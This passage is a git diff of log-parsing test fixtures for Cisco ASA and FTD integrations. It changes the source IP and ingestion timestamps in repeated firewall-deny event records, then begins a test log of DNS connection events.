- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605112300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19162,8 +19162,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19197,7 +19197,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19206,8 +19206,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095207685Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605116Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19243,8 +19243,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19278,7 +19278,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19287,8 +19287,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095209522Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605120300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19324,8 +19324,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19359,7 +19359,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19368,8 +19368,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095211339Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605125200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19405,8 +19405,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19440,7 +19440,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19449,8 +19449,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095213154Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605129700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19486,8 +19486,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19521,7 +19521,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19530,8 +19530,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095214956Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605133300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19567,8 +19567,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19602,7 +19602,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19611,8 +19611,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095216800Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605137600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19648,8 +19648,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19683,7 +19683,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19692,8 +19692,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095218795Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605143100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19729,8 +19729,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19764,7 +19764,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19773,8 +19773,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095220690Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605148400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19810,8 +19810,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19845,7 +19845,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19854,8 +19854,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095222507Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605152Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19891,8 +19891,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -19926,7 +19926,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -19935,8 +19935,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095224316Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605156200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -19972,8 +19972,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20007,7 +20007,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20016,8 +20016,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095226133Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605159800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20053,8 +20053,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20088,7 +20088,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20097,8 +20097,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095227944Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605164400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20134,8 +20134,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20169,7 +20169,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20178,8 +20178,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095229910Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605169700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20215,8 +20215,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20250,7 +20250,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20259,8 +20259,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095231714Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605174Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20296,8 +20296,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20331,7 +20331,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20340,8 +20340,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095233535Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605179400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20377,8 +20377,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20412,7 +20412,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20421,8 +20421,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095235326Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605184800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20458,8 +20458,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20493,7 +20493,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20502,8 +20502,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095237123Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605190100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20539,8 +20539,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20574,7 +20574,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20583,8 +20583,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095239018Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605195600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20620,8 +20620,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20655,7 +20655,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20664,8 +20664,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095240855Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605201Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20701,8 +20701,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20736,7 +20736,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20745,8 +20745,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095242666Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605206400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20782,8 +20782,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20817,7 +20817,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20826,8 +20826,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095244498Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605211800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20863,8 +20863,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20898,7 +20898,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20907,8 +20907,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:25.095246300Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:32:20.605217200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log
index ce15fb2bdfa..996a1347fea 100644
--- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log
+++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log
@@ -1,21 +1,21 @@ -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: 
elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, 
ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, 
